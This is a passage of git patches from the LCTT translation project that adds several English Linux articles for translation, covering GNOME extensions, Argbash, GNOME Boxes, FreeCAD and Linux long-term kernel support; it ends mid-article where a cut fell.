+Caffeine Disabled:   +![](https://itsfoss.com/wp-content/uploads/2017/11/caffeine-enabled-300x78.jpg) + +Caffeine Enabled: +![](https://itsfoss.com/wp-content/uploads/2017/11/caffeine-disabled-300x75.jpg) + +[Caffeine][21] + +### 5\. CPU Power Management [Only for Intel CPUs] + +This is an extension that, at first, I didn’t think would be very useful, but after some time using it I have found that functionality like this should be backed into all computers by default. At least all laptops. CPU Power Management allows you to chose how much of your computer’s resources are being used at any given time. + +Its simple drop-down menu allows the user to change between various preset or user made profiles that control at what frequency your CPU is to run. For example, you can set your CPU to the “Quiet” present which tells your computer to only us a maximum of 30% of its resources in this case. + +On the other hand, you can set it to the “High Performance” preset to allow your computer to run at full potential. This comes in handy if you have loud fans and want to minimize the amount of noise they make or if you just need to save some battery life. + +One thing to note is that  _this only works on computers with an Intel CPU_ , so keep that in mind. + +![](https://itsfoss.com/wp-content/uploads/2017/11/CPU-300x194.jpg) + +[CPU Power Management][22] + +### 6\. Clipboard Indicator  + +Clipboard Indicator is a clean and simple clipboard management tool. The extension sits in the top bar and caches your recent clipboard history (things you copy and paste). It will continue to save this information until the user clears the extension’s history. + +If you know that you are about to work with documentation that you don’t want to be saved in this way, like Credit Card numbers or any of your personal information, Clipboard Indicator offers a private mode that the user can toggle on and off for such cases. + +![](https://itsfoss.com/wp-content/uploads/2017/11/clipboard-300x200.jpg) + +[Clipboard Indicator][23] + +### 7\. Extensions + +The Extensions extension allows the user to enable/disable other extensions and to access their settings in one singular extension. Extensions either sit next to your other icons and extensions in the panel or in the user drop-down menu. + +Redundancies aside, Extensions is a great way to gain easy access to all your extensions without the need to open up the GNOME Tweak Tool to do so.  + +![](https://itsfoss.com/wp-content/uploads/2017/11/extensions-300x185.jpg) + +[Extensions][24] + +### 8\. Frippery Move Clock + +For those of us who are used to having the clock to the right of the Panel in Unity, this extension does the trick. Frippery Move Clock moves the clock from the middle of the top panel to the right side. It takes the calendar and notification window with it but does not migrate the notifications themselves. We have another application later in this list, Panel OSD, that can add bring your notifications over to the right as well. + +Before Frippery:  +![](https://itsfoss.com/wp-content/uploads/2017/11/before-move-clock-300x19.jpg) + +After Frippery: +![](https://itsfoss.com/wp-content/uploads/2017/11/after-move-clock-300x19.jpg) + +[Frippery Move Clock][25] + +### 9\. Gno-Menu + +Gno-Menu brings a more traditional menu to the GNOME DE. Not only does it add an applications menu to the top panel but it also brings a ton of functionality and customization with it. If you are used to using the Applications Menu extension traditionally found in GNOME but don’t want the bugs and issues that Ubuntu 17.10 brought to is, Gno-Meny is an awesome alternative. + +![](https://itsfoss.com/wp-content/uploads/2017/11/Gno-Menu-300x169.jpg) + +[Gno-Menu][26] + +### 10\. User Themes + +User Themes is a must for anyone looking to customize their GNOME desktop. By default, GNOME Tweaks lets its users change the theme of the applications themselves, icons, and cursors but not the theme of the shell. User Themes fixes that by enabling us to change the theme of GNOME Shell, allowing us to get the most out of our customization experience.  Check out our [video][27] or read our article to know how to [install new themes][28]. + +User Themes Off: +![](https://itsfoss.com/wp-content/uploads/2017/11/user-themes-off-300x141.jpg) +User Themes On: +![](https://itsfoss.com/wp-content/uploads/2017/11/user-themes-on-300x141.jpg) + +[User Themes][29] + +### 11\. Hide Activities Button + +Hide Activities Button does exactly what you would expect. It hides the activities button found a the leftmost corner of the top panel. This button traditionally actives the activities overview in GNOME, but plenty of people use the Super Key on the keyboard to do this same function. + +Though this disables the button itself, it does not disable the hot corner. Since Ubuntu 17.10 offers the ability to shut off the hot corner int he native settings application this not a huge deal for Ubuntu users. For other distributions, there are a plethora of other ways to disable the hot corner if you so desire, which we will not cover in this particular article. + +Before: ![](https://itsfoss.com/wp-content/uploads/2017/11/activies-present-300x15.jpg) After: +![](https://itsfoss.com/wp-content/uploads/2017/11/activities-removed-300x15.jpg) + +#### [Hide Activities Button][30]  + +### 12\. MConnect + +MConnect offers a way to seamlessly integrate the [KDE Connect][31] application within the GNOME desktop. Though KDE Connect offers a way for users to connect their Android handsets with virtually any Linux DE its indicator lacks a good way to integrate more seamlessly into any other DE than [Plasma][32]. + +MConnect fixes that, giving the user a straightforward drop-down menu that allows them to send SMS messages, locate their phones, browse their phone’s file system, and to send files to their phone from the desktop. Though I had to do some tweaking to get MConnect to work just as I would expect it to, I couldn’t be any happier with the extension. + +Do remember that you will need KDE Connect installed alongside MConnect in order to get it to work. + +![](https://itsfoss.com/wp-content/uploads/2017/11/MConenct-300x174.jpg) + +[MConnect][33] + +### 13\. OpenWeather + +OpenWeather adds an extension to the panel that gives the user weather information at a glance. It is customizable, it lets the user view weather information for whatever location they want to, and it doesn’t rely on the computers location services. OpenWeather gives the user the choice between [OpenWeatherMap][34] and [Dark Sky][35] to provide the weather information that is to be displayed. + +![](https://itsfoss.com/wp-content/uploads/2017/11/OpenWeather-300x147.jpg) + +[OpenWeather][36] + +### 14\. Panel OSD + +This is the extension I mentioned earlier which allows the user to customize the location in which their desktop notifications appear on the screen. Not only does this allow the user to move their notifications over to the right, but Panel OSD gives the user the option to put their notifications literally anywhere they want on the screen. But for us migrating from Unity to GNOME, switching the notifications from the top middle to the top right may make us feel more at home. + +Before: +![](https://itsfoss.com/wp-content/uploads/2017/11/osd1-300x40.jpg) + +After: +![](https://itsfoss.com/wp-content/uploads/2017/11/osd-300x36.jpg) + +#### [Panel OSD][37]  + +### 15\. Places Status Indicator + +Places Status Indicator has been a recommended extension for as long as people have started recommending extensions. Places adds a drop-down menu to the panel that gives the user quick access to various areas of the file system, from the home directory to serves your computer has access to and anywhere in between. + +The convenience and usefulness of this extension become more apparent as you use it, becoming a fundamental way you navigate your system. I couldn’t recommend it more highly enough. + +![](https://itsfoss.com/wp-content/uploads/2017/11/Places-288x300.jpg) + +[Places Status Indicator][38] + +### 16\. Refresh Wifi Connections + +One minor annoyance in GNOME is that the Wi-Fi Networks dialog box does not have a refresh button on it when you are trying to connect to a new Wi-Fi network. Instead, it makes the user wait while the system automatically refreshes the list. Refresh Wifi Connections fixes this. It simply adds that desired refresh button to the dialog box, adding functionality that really should be included out of the box. + +Before:  +![](https://itsfoss.com/wp-content/uploads/2017/11/refresh-before-292x300.jpg) + +After: +![](https://itsfoss.com/wp-content/uploads/2017/11/Refresh-after-280x300.jpg) + +#### [Refresh Wifi Connections][39]  + +### 17\. Remove Dropdown Arrows + +The Remove Dropdown Arrows extension removes the arrows on the panel that signify when an icon has a drop-down menu that you can interact with. This is purely an aesthetic tweak and isn’t always necessary as some themes remove these arrows by default. But themes such as [Numix][40], which happens to be my personal favorite, don’t remove them. + +Remove Dropdown Arrows brings that clean look to the GNOME Shell that removes some unneeded clutter. The only bug I have encountered is that the CPU Management extension I mentioned earlier will randomly “respawn” the drop-down arrow. To turn it back off I have to disable Remove Dropdown Arrows and then enable it again until once more it randomly reappears out of nowhere.  + +Before:   +![](https://itsfoss.com/wp-content/uploads/2017/11/remove-arrows-before-300x17.jpg) + +After: +![](https://itsfoss.com/wp-content/uploads/2017/11/remove-arrows-after-300x14.jpg) + +[Remove Dropdown Arrows][41] + +### 18\. Status Area Horizontal Spacing + +This is another extension that is purely aesthetic and is only “necessary” in certain themes. Status Area Horizontal Spacing allows the user to control the amount of space between the icons in the status bar. If you think your status icons are too close or too spaced out, then this extension has you covered. Just select the padding you would like and you’re set. + +Maximum Spacing:  +![](https://itsfoss.com/wp-content/uploads/2017/11/spacing-2-300x241.jpg) + +Minimum Spacing: +![](https://itsfoss.com/wp-content/uploads/2017/11/spacing-300x237.jpg) + +#### [Status Area Horizontal Spacing][42]  + +### 19\. Steal My Focus + +By default, when you open an application in GNOME is will sometimes stay behind what you have open if a different application has focus. GNOME then notifies you that the application you selected has opened and it is up to you to switch over to it. But, in my experience, this isn’t always consistent. There are certain applications that seem to jump to the front when opened while the rest rely on you to see the notifications to know they opened. + +Steal My Focus changes that by removing the notification and immediately giving the user focus of the application they just opened. Because of this inconsistency, it was difficult for me to get a screenshot so you just have to trust me on this one. ;) + +#### [Steal My Focus][43]  + +### 20\. Workspaces to Dock  + +This extension changed the way I use GNOME. Period. It allows me to be more productive and aware of my virtual desktop, making for a much better user experience. Workspaces to Dock allows the user to customize their overview workspaces by turning into an interactive dock. + +You can customize its look, size, functionality, and even position. It can be used purely for aesthetics, but I think the real gold is using it to make the workspaces more fluid, functional, and consistent with the rest of the UI. + +![](https://itsfoss.com/wp-content/uploads/2017/11/Workspaces-to-dock-300x169.jpg) + +[Workspaces to Dock][44] + +### Honorable Mentions: Dash to Dock and Dash to Panel   + +Dash to Dock and Dash to Panel are not included in the official 20 extensions of this article for one main reason: Ubuntu Dock. Both extensions allow the user to make the GNOME Dash either a dock or a panel respectively and add more customization than comes by default. + +The problem is that to get the full functionality of these two extensions you will need to jump through some hoops to disable Ubuntu Dock, which I won’t outline in this article. We acknowledge that not everyone will be using Ubuntu 17.10, so for those of you that aren’t this may not apply to you. That being said, bot of these extensions are great and are included among some of the most popular GNOME extensions you will find. + +Currently, there is a “bug” in Dash to Dock whereby changing its setting, even with the extension disabled, the changes apply to the Ubuntu Dock as well.  I say “bug” because I actually use this myself to customize Ubuntu Dock without the need for the extensions to be activated.  This may get patched in the future, but until then consider that a free tip. + +###    [Dash to Dock][45]     [Dash to Panel][46] + +So there you have it, our top 20 GNOME Extensions you should try right now. Which of these extensions do you particularly like? Which do you dislike? Let us know in the comments below and don’t be afraid to say something if there is anything you think we missed. + +### About Phillip Prado + +Phillip Prado is an avid follower of all things tech, culture, and art. Not only is he an all-around geek, he has a BA in cultural communications and considers himself a serial hobbyist. He loves hiking, cycling, poetry, video games, and movies. But no matter what his passions are there is only one thing he loves more than Linux and FOSS: coffee. You can find him (nearly) everywhere on the web as @phillipprado. +-------------------------------------------------------------------------------- + +via: https://itsfoss.com/best-gnome-extensions/ + +作者:[ Phillip Prado][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://itsfoss.com/author/phillip/ +[1]:https://itsfoss.com/author/phillip/ +[2]:https://itsfoss.com/best-gnome-extensions/#comments +[3]:https://www.facebook.com/share.php?u=https%3A%2F%2Fitsfoss.com%2Fbest-gnome-extensions%2F%3Futm_source%3Dfacebook%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[4]:https://twitter.com/share?original_referer=/&text=Top+20+GNOME+Extensions+You+Should+Be+Using+Right+Now&url=https://itsfoss.com/best-gnome-extensions/%3Futm_source%3Dtwitter%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare&via=phillipprado +[5]:https://plus.google.com/share?url=https%3A%2F%2Fitsfoss.com%2Fbest-gnome-extensions%2F%3Futm_source%3DgooglePlus%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[6]:https://www.linkedin.com/cws/share?url=https%3A%2F%2Fitsfoss.com%2Fbest-gnome-extensions%2F%3Futm_source%3DlinkedIn%26utm_medium%3Dsocial%26utm_campaign%3DSocialWarfare +[7]:http://www.stumbleupon.com/submit?url=https://itsfoss.com/best-gnome-extensions/&title=Top+20+GNOME+Extensions+You+Should+Be+Using+Right+Now +[8]:https://www.reddit.com/submit?url=https://itsfoss.com/best-gnome-extensions/&title=Top+20+GNOME+Extensions+You+Should+Be+Using+Right+Now +[9]:https://extensions.gnome.org/ +[10]:https://www.gnome.org/ +[11]:https://itsfoss.com/ubuntu-17-10-release-features/ +[12]:https://itsfoss.com/ubuntu-unity-shutdown/ +[13]:https://itsfoss.com/gnome-shell-extensions/ +[14]:https://www.kde.org/ +[15]:https://elementary.io/ +[16]:https://itsfoss.com/gnome-3-26-released/ +[17]:https://extensions.gnome.org/extension/1217/appfolders-manager/ +[18]:https://en.wikipedia.org/wiki/APT_(Debian) +[19]:https://extensions.gnome.org/extension/1139/apt-update-indicator/ +[20]:https://extensions.gnome.org/extension/16/auto-move-windows/ +[21]:https://extensions.gnome.org/extension/517/caffeine/ +[22]:https://extensions.gnome.org/extension/945/cpu-power-manager/ +[23]:https://extensions.gnome.org/extension/779/clipboard-indicator/ +[24]:https://extensions.gnome.org/extension/1036/extensions/ +[25]:https://extensions.gnome.org/extension/2/move-clock/ +[26]:https://extensions.gnome.org/extension/608/gnomenu/ +[27]:https://youtu.be/9TNvaqtVKLk +[28]:https://itsfoss.com/install-themes-ubuntu/ +[29]:https://extensions.gnome.org/extension/19/user-themes/ +[30]:https://extensions.gnome.org/extension/744/hide-activities-button/ +[31]:https://community.kde.org/KDEConnect +[32]:https://www.kde.org/plasma-desktop +[33]:https://extensions.gnome.org/extension/1272/mconnect/ +[34]:http://openweathermap.org/ +[35]:https://darksky.net/forecast/40.7127,-74.0059/us12/en +[36]:https://extensions.gnome.org/extension/750/openweather/ +[37]:https://extensions.gnome.org/extension/708/panel-osd/ +[38]:https://extensions.gnome.org/extension/8/places-status-indicator/ +[39]:https://extensions.gnome.org/extension/905/refresh-wifi-connections/ +[40]:https://numixproject.github.io/ +[41]:https://extensions.gnome.org/extension/800/remove-dropdown-arrows/ +[42]:https://extensions.gnome.org/extension/355/status-area-horizontal-spacing/ +[43]:https://extensions.gnome.org/extension/234/steal-my-focus/ +[44]:https://extensions.gnome.org/extension/427/workspaces-to-dock/ +[45]:https://extensions.gnome.org/extension/307/dash-to-dock/ +[46]:https://extensions.gnome.org/extension/1160/dash-to-panel/ From 57e2dd7066ccd7331d727bfbe728fc6f914851bd Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:37:03 +0800 Subject: [PATCH 0441/1627] =?UTF-8?q?20171209-10=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ... Improve your Bash scripts with Argbash.md | 113 ++++++++++++++++++ 1 file changed, 113 insertions(+) create mode 100644 sources/tech/20171204 Improve your Bash scripts with Argbash.md diff --git a/sources/tech/20171204 Improve your Bash scripts with Argbash.md b/sources/tech/20171204 Improve your Bash scripts with Argbash.md new file mode 100644 index 0000000000..826512867e --- /dev/null +++ b/sources/tech/20171204 Improve your Bash scripts with Argbash.md @@ -0,0 +1,113 @@ +# [Improve your Bash scripts with Argbash][1] + +![](https://fedoramagazine.org/wp-content/uploads/2017/11/argbash-1-945x400.png) + +Do you write or maintain non-trivial bash scripts? If so, you probably want them to accept command-line arguments in a standard and robust way. Fedora recently got [a nice addition][2] which can help you produce better scripts. And don’t worry, it won’t cost you much of your time or energy. + +### Why Argbash? + +Bash is an interpreted command-line language with no standard library. Therefore, if you write bash scripts and want command-line interfaces that conform to [POSIX][3] and [GNU CLI][4] standards, you’re used to only two options: + +1. Write the argument-parsing functionality tailored to your script yourself (possibly using the `getopts` builtin). + +2. Use an external bash module. + +The first option looks incredibly silly as implementing the interface properly is not trivial. However, it is suggested as the best choice on various sites ranging from [Stack Overflow][5] to the [Bash Hackers][6] wiki. + +The second option looks smarter, but using a module has its issues. The biggest is you have to bundle its code with your script. This may mean either: + +* You distribute the library as a separate file, or + +* You include the library code at the beginning of your script. + +Having two files instead of one is awkward. So is polluting your bash scripts with a chunk of complex code over thousand lines long. + +This was the main reason why the Argbash [project came to life][7]. Argbash is a code generator, so it generates a tailor-made parsing library for your script. Unlike the generic code of other bash modules, it produces minimal code your script needs. Moreover, you can request even simpler code if you don’t need 100% conformance to these CLI standards. + +### Example + +### Analysis + +Let’s say you want to implement a script that [draws a bar][8] across the terminal window. You do that by repeating a single character of your choice multiple times. This means you need to get the following information from the command-line: + +* _The character which is the element of the line. If not specified, use a dash._  On the command-line, this would be a single-valued positional argument  _character_  with a default value of -. + +* _Length of the line. If not specified, go for 80._  This is a single-valued optional argument  _–length_  with a default of 80. + +* _Verbose mode (for debugging)._  This is a boolean argument  _verbose_ , off by default. + +As the body of the script is really simple, this article focuses on getting the input of the user from the command-line to appropriate script variables. Argbash generates code that saves parsing results to shell variables  __arg_character_ ,  __arg_length_  and  __arg_verbose_ . + +### Execution + +In order to proceed, you need the  _argbash-init_  and  _argbash_  bash scripts that are parts of the  _argbash_  package. Therefore, run this command: + +``` +sudo dnf install argbash +``` + +Then, use  _argbash-init_  to generate a template for  _argbash_ , which generates the executable script. You want three arguments: a positional one called  _character_ , an optional  _length_  and an optional boolean  _verbose_ . Tell this to  _argbash-init_ , and then pass the output to  _argbash_ : + +``` +argbash-init --pos character --opt length --opt-bool verbose script-template.sh +argbash script-template.sh -o script +./script +``` + +See the help message? Looks like the script doesn’t know about the default option for the character argument. So take a look at the [Argbash API][9], and then fix the issue by editing the template section of the script: + +``` +# ... +# ARG_OPTIONAL_SINGLE([length],[l],[Length of the line],[80]) +# ARG_OPTIONAL_BOOLEAN([verbose],[V],[Debug mode]) +# ARG_POSITIONAL_SINGLE([character],[The element of the line],[-]) +# ARG_HELP([The line drawer]) +# ... +``` + +Argbash is so smart that it tries to make every generated script a template of itself. This means you don’t have to worry about storing source templates for further use. You just shouldn’t lose your generated bash scripts. Now, try to regenerate the future line drawer to work as expected: + +``` +argbash script -o script +./script +``` + +As you can see, everything is working all right. The only thing left to do is fill in the line drawing functionality itself. + +### Conclusion + +You might find the section containing parsing code quite long, but consider that it allows you to call  _./script.sh x -Vl50_  and it will be understood the same way as  _./script -V -l 50 x. I_ t does require some code to get this right. + +However, you can shift the balance between generated code complexity and parsing abilities towards more simple code by calling  _argbash-init_  with argument  _–mode_  set to  _minimal_ . This option reduces the size of the script by about 20 lines, which corresponds to a roughly 25% decrease of the generated parsing code size. On the other hand, the  _full_  mode makes the script even smarter. + +If you want to examine the generated code, give  _argbash_  the argument  _–commented_ , which puts comments into the parsing code that reveal the intent behind various sections. Compare that to other argument parsing libraries such as [shflags][10], [argsparse][11] or [bash-modules/arguments][12], and you’ll see the powerful simplicity of Argbash. If something goes horribly wrong and you need to fix a glitch in the parsing functionality quickly, Argbash allows you to do that as well. + +As you’re most likely a Fedora user, you can enjoy the luxury of having command-line Argbash installed from the official repositories. However, there is also an [online parsing code generator][13] at your service. Furthermore, if you’re working on a server with Docker, you can appreciate the [Argbash Docker image][14]. + +So enjoy and make sure that your scripts have a command-line interface that pleases your users. Argbash is here to help, with minimal effort required from your side. + +-------------------------------------------------------------------------------- + +via: https://fedoramagazine.org/improve-bash-scripts-argbash/ + +作者:[Matěj Týč ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://fedoramagazine.org/author/bubla/ +[1]:https://fedoramagazine.org/improve-bash-scripts-argbash/ +[2]:https://argbash.readthedocs.io/ +[3]:http://pubs.opengroup.org/onlinepubs/9699919799/basedefs/V1_chap12.html +[4]:https://www.gnu.org/prep/standards/html_node/Command_002dLine-Interfaces.html +[5]:https://stackoverflow.com/questions/192249/how-do-i-parse-command-line-arguments-in-bash +[6]:http://wiki.bash-hackers.org/howto/getopts_tutorial +[7]:https://argbash.readthedocs.io/ +[8]:http://wiki.bash-hackers.org/snipplets/print_horizontal_line +[9]:http://argbash.readthedocs.io/en/stable/guide.html#argbash-api +[10]:https://raw.githubusercontent.com/Anvil/bash-argsparse/master/argsparse.sh +[11]:https://raw.githubusercontent.com/Anvil/bash-argsparse/master/argsparse.sh +[12]:https://raw.githubusercontent.com/vlisivka/bash-modules/master/main/bash-modules/src/bash-modules/arguments.sh +[13]:https://argbash.io/generate +[14]:https://hub.docker.com/r/matejak/argbash/ From 52f00820b803b2ab716a7e0ed859820cc585fb41 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:39:09 +0800 Subject: [PATCH 0442/1627] =?UTF-8?q?20171209-11=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...s It Easier to Test Drive Linux Distros.md | 45 +++++++++++++++++++ 1 file changed, 45 insertions(+) create mode 100644 sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md diff --git a/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md b/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md new file mode 100644 index 0000000000..42556932c1 --- /dev/null +++ b/sources/tech/20171204 GNOME Boxes Makes It Easier to Test Drive Linux Distros.md @@ -0,0 +1,45 @@ +# GNOME Boxes Makes It Easier to Test Drive Linux Distros + +![GNOME Boxes Distribution Selection](http://www.omgubuntu.co.uk/wp-content/uploads/2017/12/GNOME-Boxes-INstall-Distros-750x475.jpg) + +Creating Linux virtual machines on the GNOME desktop is about to get a whole lot easier. + +The next major release of  [_GNOME Boxes_][5]  is able to download popular Linux (and BSD-based) operating systems directly inside the app itself. + +Boxes is free, open-source software. It can be used to access both remote and virtual systems as it is built around [QEMU][6], KVM, and libvirt virtualisation technologies. + +For its new ISO-toting integration  _Boxes_  makes use of [libosinfo][7], a database of operating systems that also provides details on any virtualized environment requirements. + +In [this (mis-titled) video][8] from GNOME developer Felipe Borges you can see just how easy the improved ‘Source Selection’ screen makes things, including the ability to download a specific ISO architecture for a given distro: + +[video](https://youtu.be/CGahI05Gbac) + +Despite it being a core GNOME app I have to confess that I have never used Boxes. It’s not that I don’t hear good things about it (I do) it’s just that I’m more familiar with setting up and configuring virtual machines in VirtualBox. + +> ‘The lazy geek inside me is going to appreciate this integration’ + +Admitted it’s not exactly  _difficult_  to head out and download an ISO using the browser, then point a virtual machine app to it (heck, it’s what most of us have been doing for a decade or so). + +But the lazy geek inside me is really going to appreciate this integration. + +So, thanks to this feature I’ll be unpacking Boxes on my system when GNOME 3.28 is released next March. I will be able to launch  _Boxes_ , close my eyes,pick a distro from the list at random, and instantly broaden my Tux-shaped horizons. + +-------------------------------------------------------------------------------- + +via: http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly + +作者:[ JOEY SNEDDON ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://plus.google.com/117485690627814051450/?rel=author +[1]:https://plus.google.com/117485690627814051450/?rel=author +[2]:http://www.omgubuntu.co.uk/category/dev +[3]:http://www.omgubuntu.co.uk/category/video +[4]:http://www.omgubuntu.co.uk/2017/12/gnome-boxes-install-linux-distros-directly +[5]:https://en.wikipedia.org/wiki/GNOME_Boxes +[6]:https://en.wikipedia.org/wiki/QEMU +[7]:https://libosinfo.org/ +[8]:https://blogs.gnome.org/felipeborges/boxes-downloadable-oses/ From 6f6bec6b60f807e9e836faab78c3177044afb375 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:41:07 +0800 Subject: [PATCH 0443/1627] =?UTF-8?q?20171209-12=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...3D Modeling and Design Software for Linux.md | 80 +++++++++++++++++++ 1 file changed, 80 insertions(+) create mode 100644 sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md diff --git a/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md b/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md new file mode 100644 index 0000000000..6df21bce1b --- /dev/null +++ b/sources/tech/20171204 FreeCAD – A 3D Modeling and Design Software for Linux.md @@ -0,0 +1,80 @@ +FreeCAD – A 3D Modeling and Design Software for Linux +============================================================ +![FreeCAD 3D Modeling Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Modeling-Software.png) + +[FreeCAD][8] is a cross-platform OpenCasCade-based mechanical engineering and product design tool. Being a parametric 3D modeler it works with PLM, CAx, CAE, MCAD and CAD and its functionalities can be extended using tons of advanced extensions and customization options. + +It features a QT-based minimalist User Interface with toggable panels, layouts, toolbars, a broad Python API, and an Open Inventor-compliant 3D scene representation model (thanks to the Coin 3D library). + + [![FreeCAD 3D Software](https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png)][9] + +FreeCAD 3D Software + +As is listed on the website, FreeCAD has a coupled of user cases, namely: + +> * The Home User/Hobbyist: Got yourself a project you want to build, have built, or 3D printed? Model it in FreeCAD. No previous CAD experience required. Our community will help you get the hang of it quickly! +> +> * The Experienced CAD User: If you use commercial CAD or BIM modeling software at work, you will find similar tools and workflow among the many workbenches of FreeCAD. +> +> * The Programmer: Almost all of FreeCAD’s functionality is accessible to Python. You can easily extend FreeCAD’s functionality, automatize it with scripts, build your own modules or even embed FreeCAD in your own application. +> +> * The Educator: Teach your students a free software with no worry about license purchase. They can install the same version at home and continue using it after leaving school. + +#### Features in FreeCAD + +* Freeware: FreeCAD is free for everyone to download and use. + +* Open Source: Contribute to the source code on [GitHub][4]. + +* Cross-Platform: All Windows, Linux, and Mac users can enjoy the coolness of FreeCAD. + +* A comprehensive [Online Documentation][5]. + +* A free [Online Manual][6] for beginners and pros alike. + +* Annotations support e.g. text and dimensions. + +* A built-in Python console. + +* A fully customizable and scriptable UI. + +* An online community for showcasing projects [here][7]. + +* Extendable modules for modeling and designing a variety of objects e.g. + +FreeCAD has a lot more features to offer users than we can list here so feel free to see the rest of them on its website’s [Features page][11]. + +There are many 3D modeling tools in the market but they are barely free. If you are a modeling engineer, architect, or artist and are looking for an application you can use without necessarily shelling out any cash then FreeCAD is a beautiful open-source project you should check out. + +Give it a test-drive and see if you don’t like it. + +[Download FreeCAD for Linux][13] + +Are you already a FreeCAD user? Which of its features do you enjoy the most and have you come across any alternatives that may go head to head with its abilities? + +Remember that your comments, suggestions, and constructive criticisms are always welcome in the comments section below. + +-------------------------------------------------------------------------------- + +via: https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/ + +作者:[Martins D. Okoi ][a] +译者:[译者ID](https://github.com/译者ID) +校对:[校对者ID](https://github.com/校对者ID) + +本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出 + +[a]:https://www.fossmint.com/author/dillivine/ +[1]:https://www.fossmint.com/author/dillivine/ +[2]:https://www.fossmint.com/author/dillivine/ +[3]:https://www.fossmint.com/freecad-3d-modeling-and-design-software-for-linux/#disqus_thread +[4]:https://github.com/FreeCAD/FreeCAD +[5]:https://www.freecadweb.org/wiki/Main_Page +[6]:https://www.freecadweb.org/wiki/Manual +[7]:https://forum.freecadweb.org/viewforum.php?f=24 +[8]:http://www.freecadweb.org/ +[9]:https://www.fossmint.com/wp-content/uploads/2017/12/FreeCAD-3D-Software.png +[10]:https://www.fossmint.com/synfig-an-adobe-animate-alternative-for-gnulinux/ +[11]:https://www.freecadweb.org/wiki/Feature_list +[12]:http://www.tecmint.com/red-hat-rhcsa-rhce-exam-certification-book/ +[13]:https://www.freecadweb.org/wiki/Download From 08b1593a06d8a3a49cbbc5035a4db7d290dea133 Mon Sep 17 00:00:00 2001 From: Ezio Date: Sat, 9 Dec 2017 15:45:07 +0800 Subject: [PATCH 0444/1627] =?UTF-8?q?20171209-12=20=E9=80=89=E9=A2=98?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...Long-term Linux support future clarified.md | 52 +++++++++++++++++++ 1 file changed, 52 insertions(+) create mode 100644 sources/tech/20171127 ​Long-term Linux support future clarified.md diff --git a/sources/tech/20171127 ​Long-term Linux support future clarified.md b/sources/tech/20171127 ​Long-term Linux support future clarified.md new file mode 100644 index 0000000000..e077f33425 --- /dev/null +++ b/sources/tech/20171127 ​Long-term Linux support future clarified.md @@ -0,0 +1,52 @@ +Long-term Linux support future clarified +============================================================ + +Long-term support Linux version 4.4 will get six years of life, but that doesn't mean other LTS editions will last so long. + +[video](http://www.zdnet.com/video/video-torvalds-surprised-by-resilience-of-2-6-kernel-1/) + + _Video: Torvalds surprised by resilience of 2.6 kernel_ + +In October 2017, the [Linux kernel team agreed to extend the next version of Linux's Long Term Support (LTS) from two years to six years][5], [Linux 4.14][6]. This helps [Android][7], embedded Linux, and Linux Internet of Things (IoT) developers. But this move did not mean all future Linux LTS versions will have a six-year lifespan. + +As Konstantin Ryabitsev, [The Linux Foundation][8]'s director of IT infrastructure security, explained in a Google+ post, "Despite what various news sites out there may have told you, [kernel 4.14 LTS is not planned to be supported for 6 years][9]. Just because Greg Kroah-Hartman is doing it for 4.4 does not mean that all LTS kernels from now on are going to be maintained for that long." + +So, in short, 4.14 will be supported until January 2020, while the 4.4 Linux kernel, which arrived on Jan. 20, 2016, will be supported until 2022\. Therefore, if you're working on a Linux distribution that's meant for the longest possible run, you want to base it on [Linux 4.4][10]. + +[Linux LTS versions][11] incorporate back-ported bug fixes for older kernel trees. Not all bug fixes are imported; only important bug fixes are applied to such kernels. They, especially for older trees, don't usually see very frequent releases. + +The other Linux versions are Prepatch or release candidates (RC), Mainline, Stable, and LTS. + +RC must be compiled from source and usually contains bug fixes and new features. These are maintained and released by Linus Torvalds. He also maintains the Mainline tree (this is where all new features are introduced). New mainline kernels are released every few months. When the mainline kernel is released for general use, it is considered "stable." Bug fixes for a stable kernel are back-ported from the mainline tree and applied by a designated stable kernel maintainer. There are usually only a few bug-fix kernel releases until the next mainline kernel becomes available. + +As for the latest LTS, Linux 4.14, Ryabitsev said, "It is possible that someone may pick up maintainership of 4.14 after Greg is done with it (it's happened in the past on multiple occasions), but you should emphatically not plan on that." + +Kroah-Hartman simply added to Ryabitsev's post: ["What he said."][12] + +-------------------------------------------------------------------------------- + +via: http://www.zdnet.com/article/long-term-linux-support-future-clarified/ + +作者:[Steven 